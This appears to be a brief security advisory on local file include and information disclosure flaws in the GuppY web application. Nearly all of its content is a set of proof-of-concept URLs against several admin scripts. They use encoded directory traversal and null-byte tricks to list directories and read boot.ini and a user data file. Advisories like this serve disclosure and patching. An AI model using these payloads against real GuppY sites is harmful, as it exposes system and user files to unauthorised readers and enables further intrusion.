|
GuppY Multiple Local File Include and Information Disclosure Vulnerabilities
An exploit is not required. The following proof of concept examples are available: http://www.example.com/[path_to_guppy]/admin/editorTypetool.php?cmd=DIR&meskin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F http://www.example.com/[path_to_guppy]/admin/inc/archbatch.php?lng=../../../../../../../../../../../boot.ini%00 http://www.example.com/[path_to_guppy]/admin/inc/dbbatch.php?lng=../../../../../../../../../../../ http://www.example.com/[path_to_guppy]/admin/inc/dbbatch.php?lng=../../../../../../../../../../../boot.ini%00 http://www.example.com/[path_to_guppy]/admin/inc/nwlmail.php?lng=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00 http://www.example.com/[path_to_guppy]/admin/inc/archbatch.php?lng=../../data/usermsg/username.dtb%00 |
|
|
Privacy Statement |
